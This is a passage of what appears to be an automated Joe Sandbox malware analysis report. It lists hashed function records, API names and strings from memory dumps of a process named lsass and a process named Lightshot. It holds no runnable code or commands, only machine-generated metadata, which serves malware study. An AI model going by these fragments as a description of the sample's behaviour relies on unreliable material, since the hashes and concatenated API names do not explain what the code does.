                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 9F319031292B40E1EF239B47A4007D56394B74CBB0F7985259E2E4B7A0EF7DC845C392
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: ad989254367ffea67bb77bf17bba7392694ea205673c5da45a75a0c92e4d569a
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                • String ID: wr
                                                                                • API String ID: 1092925422-2678910430
                                                                                • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                                • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$Current$Context
                                                                                • String ID:
                                                                                • API String ID: 1666949209-0
                                                                                • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                                • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                                • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: CurrentThread
• String ID: (none)
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: CurrentThread
• String ID: (none)
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: _set_statfp
• String ID: (none)
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: _set_statfp
• String ID: (none)
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: _invalid_parameter_noinfo
• String ID: Tuesday$Wednesday$or copy constructor iterator'
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID: (none)
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: Heap$Process$Free
• String ID: (none)
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: ConsoleErrorLastMode
• String ID: (none)
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID: (none)
Memory Dump Source: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140adfc0000_lsass.jbxd)
• API ID: CallTranslator
• String ID: MOC$RCC
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: FileType
• String ID: \\.\pipe\
Memory Dump Source: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true (Joe Sandbox IDA Plugin snapshot hcaresult_36_2_140ae860000_lsass.jbxd)
• API ID: ErrorFileLastWrite
• String ID: U
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 56ed09fddae288ef6c89d74bd241d2dfe88a9543861981f92f91ccf0ba0ae745
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: DCE08671650B4892DF038F22E8402D933A3DF5DB68B9891229A5C07321FA38D1FAD301
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3311300109.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140adfc0000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 4940423c840106aa278dadeec7b987efc7fd2bbde3a41644df2d62b25ed6cadf
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 05E08671610B4886DF028F22E4401D97363EF5DB58B989122CA4C07321FA38D1E6D300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: 65c83ae18bbeee38c1f395d24bd21a894001158fe5ba6808c8c40ff99673c146
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 0F119E35A41B5485EB46DB6BA8082A977A1FB8DFE0F284028DF4D47776DF38C842D381
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000024.00000002.3313357775.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_36_2_140ae860000_lsass.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction ID: 8c25a065afb30b7e91423b8a6a5c310c77542b609ab35f2169316764477aec7c
                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                • Instruction Fuzzy Hash: 47E03935A4170486EB068B63D80838A36E1EB8EB26F2480248E0907361DF7D8899D7A1

                                                                                Execution Graph

                                                                                Execution Coverage:4.9%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:193
                                                                                Total number of Limit Nodes:2

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 2643109117-1582277970
                                                                                • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction ID: 45081d0c5122471218285d22546f3b2e4dd658ae4f7f322865ddc8609c62e7db
                                                                                • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                                • Instruction Fuzzy Hash: 1D415E3BE0964785F600AB35E59577D23A1AF4DB80F446232D94DC37A2DE2EB849830A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtSetWnfProcessNotificationEvent.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E4D81156), ref: 00007FF6E4D813F7
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: EventNotificationProcess
                                                                                • String ID:
                                                                                • API String ID: 914374624-0
                                                                                • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction ID: 4c35cde3e12de7d64be0b70d783a0400092825302bd3666b3b241164786cf32a
                                                                                • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                                • Instruction Fuzzy Hash: 99F0C97AA08B4282D610CB61F88423AB764FB4D380B116E35E98DC7B25CF3DE050CF4A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                • 6, xrefs: 00007FF6E4D86A3B
                                                                                • 0, xrefs: 00007FF6E4D86F39
                                                                                • X&, xrefs: 00007FF6E4D86FAC
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen
                                                                                • API String ID: 4088430540-3141501615
                                                                                • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction ID: fef9c8b939ae1d4cc5838b978b1de2ecf5f1b1fa3d85ed33e07d479792997170
                                                                                • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                                • Instruction Fuzzy Hash: DE529427D2C6C384F7118B35E8A13F46360AFA9798F045331E98CE65A5DF2E6A45C34E

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                                • String ID: Hc=v+$&
                                                                                • API String ID: 3825114775-1582277970
                                                                                • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction ID: 28ceed0625eb0e58e24b9611ad9d913bce81299efc458190f5d0e29a03ca1fdb
                                                                                • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                                • Instruction Fuzzy Hash: 7A41423BA1964384F701EB25E59577D2351AF49B80F046232D94DC37A6DF2FB849C30A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcslen$wcscatwcscpywcsncmp
                                                                                • String ID: 0$X$`
                                                                                • API String ID: 597572034-2527496196
                                                                                • Opcode ID: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction ID: fbc2edee553321e5e2625aa0d297a3ecd5062a5633113374bb0c440f0228a616
                                                                                • Opcode Fuzzy Hash: 98185c13f6d2e375cf892135551cf39061725b7e67d8172754d23c2b4611d0ec
                                                                                • Instruction Fuzzy Hash: D702CC23908BC681E3208B29E8543BA77A0FB98794F045335EA9C977E5DF3DD685C709

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
                                                                                Similarity
                                                                                • API ID: wcscatwcscpywcslen
                                                                                • String ID: $0$0$@$@
                                                                                • API String ID: 3623275624-1413854666
                                                                                • Opcode ID: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction ID: a5e74404eb15ffb78d1f205358bd44c7f7484d1a2174a22c0cb6a4d05b0f440d
                                                                                • Opcode Fuzzy Hash: b0127d468d46c267b9460b4f0b1c573224c770eb45ce2e4a03525f6280a39a82
                                                                                • Instruction Fuzzy Hash: 5AB1E32680C6C685F321CB24E4553BA77A0FF94744F005231EACDD66A5DF7EE64ACB0A

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81C63
                                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81CC7
                                                                                • memcpy.MSVCRT ref: 00007FF6E4D81CE0
                                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF6E4D8C8F4,00007FF6E4D8C8F4,?,?,00007FF6E4D80000,?,00007FF6E4D81991), ref: 00007FF6E4D81D23
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000025.00000002.2130393951.00007FF6E4D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E4D80000, based on PE: true
                                                                                • Associated: 00000025.00000002.2130104315.00007FF6E4D80000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130472131.00007FF6E4D8B000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2130557620.00007FF6E4D8E000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131279652.00007FF6E5042000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000025.00000002.2131447980.00007FF6E5045000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_37_2_7ff6e4d80000_Lightshot.jbxd
